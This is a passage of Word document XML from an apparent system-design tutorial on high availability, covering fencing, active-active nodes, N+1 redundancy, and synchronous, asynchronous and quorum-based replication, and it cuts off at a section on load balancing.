    <w:p w14:paraId="63985C86" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Split-brain problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If the network partitions between primary and standby, both may think they're the leader. This is solved via fencing (STONITH — Shoot The Other Node In The Head) or quorum-based consensus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67226934" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> AWS RDS Multi-AZ uses synchronous replication to a standby in another Availability Zone. Failover takes 60–120 seconds. During this time, the database is unavailable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2AD8A4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Active-Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5E2DF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D4FF1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Multiple nodes simultaneously serve traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44109C9A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A load balancer distributes requests across all nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C54A7CC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>State must either be shared (shared-nothing with partitioning) or replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B60D81" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71310A3E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If user writes to Node A, does Node B see it immediately? This is the CAP theorem territory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162DA73" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conflict resolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Two users update the same record on different nodes simultaneously. You need conflict resolution strategies — Last Writer Wins (LWW), vector clocks, CRDTs, or application-level merging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48630CDF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Session affinity vs. statelessness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If nodes are stateless, any node can serve any request (ideal). If stateful, you need sticky sessions, which reduces availability because a node failure affects all its pinned users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1AF77" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Cassandra operates in active-active mode across data centers. Writes go to any node, replicate asynchronously, and conflicts are resolved via timestamps (LWW). This gives very high availability at the cost of eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E52F1D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 N+1 and N+2 Redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D3EEF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> You have one more instance than needed. If you need 4 servers to handle peak load, you run 5. One can fail without impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597410AB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N+2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Accounts for one planned maintenance + one unplanned failure simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B052A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes in capacity planning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5FA50A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>If each server handles 1,000 RPS and your peak is 4,000 RPS, running N+1 (5 servers) means each operates at 80% capacity normally. When one fails, the remaining 4 each handle 100% — no headroom left. If traffic spikes even slightly during the failure, you cascade. This is why many teams use N+2 or even maintain 50% headroom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B3856" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="6530C9FC">
          <v:rect id="_x0000_i1688" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD34ED" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Replication — Keeping Data Available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA44155" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Synchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B66E5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67573355" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Client sends write to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17594369" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Primary writes to its local storage (WAL — Write-Ahead Log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567BCC77" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Primary sends the WAL entry to replica(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665FC958" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Replica applies the write and acknowledges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC2630" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Primary acknowledges success to the client only AFTER receiving replica's ACK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6411C485" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tradeoffs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD0E4A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guarantees:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Zero data loss (RPO = 0). The replica is always in sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4209FCE8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Every write has added latency (network round-trip to replica). If the replica is in another data center (say, 50ms away), every write takes at least 50ms additional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143829D3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Availability risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If the replica is down, the primary cannot acknowledge writes. You've traded availability for consistency. PostgreSQL's synchronous replication blocks the primary if the standby is unresponsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A93973" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Asynchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0DDAA6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A0565" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Client sends write to primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFDCD87" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Primary writes to local storage and immediately acknowledges to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2AC14" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>In the background, replication stream sends WAL entries to replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715054A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Replicas apply writes with some lag (replication lag).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC7F42" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tradeoffs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AD2BC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Primary never blocks on replica. If replica dies, primary continues unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B31BEA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If primary fails before replicating a write, that write is lost (RPO &gt; 0). Replication lag can be seconds to minutes under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06429A88" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real-world:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> MySQL's default replication is async. Amazon Aurora uses a hybrid — writes to a shared distributed storage layer (6 copies across 3 AZs) with quorum writes (4/6 must acknowledge), giving both durability and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F0190" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Semi-Synchronous Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5BC6F4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A middle ground: primary waits for at least ONE replica to acknowledge, then responds to client. Other replicas receive asynchronously. MySQL's semi-sync replication works this way — guaranteeing at least one replica has the data before acknowledging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC7016" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Quorum-Based Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294AF9E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal mechanism (used by Dynamo-style systems like Cassandra, Riak, DynamoDB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D222001" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> = total replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132BDE1" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> = number of nodes that must acknowledge a write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB095A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> = number of nodes that must respond to a read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46928668" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The rule:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If W + R &gt; N, you guarantee reading the latest write (strong consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B1869" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example with N=3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C246763" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>W=2, R=2: Strongly consistent. Can tolerate 1 node failure for both reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F0287" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>W=1, R=1: Highly available but eventually consistent. Can tolerate 2 node failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30CC68" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>W=3, R=1: Writes need all nodes (less available for writes), but reads are fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311EAA0B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes during a write (W=2, N=3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E3002" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Coordinator node receives the write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E345F32" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Sends write to all 3 replica nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A34C9EB" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Waits until 2 respond with success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36333006" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Returns success to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C62AB2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The 3rd node may receive the write later (hinted handoff if it was down).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160EAAC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="1BC1B652">
          <v:rect id="_x0000_i1689" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E179391" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Load Balancing — Distributing for Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984D54E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
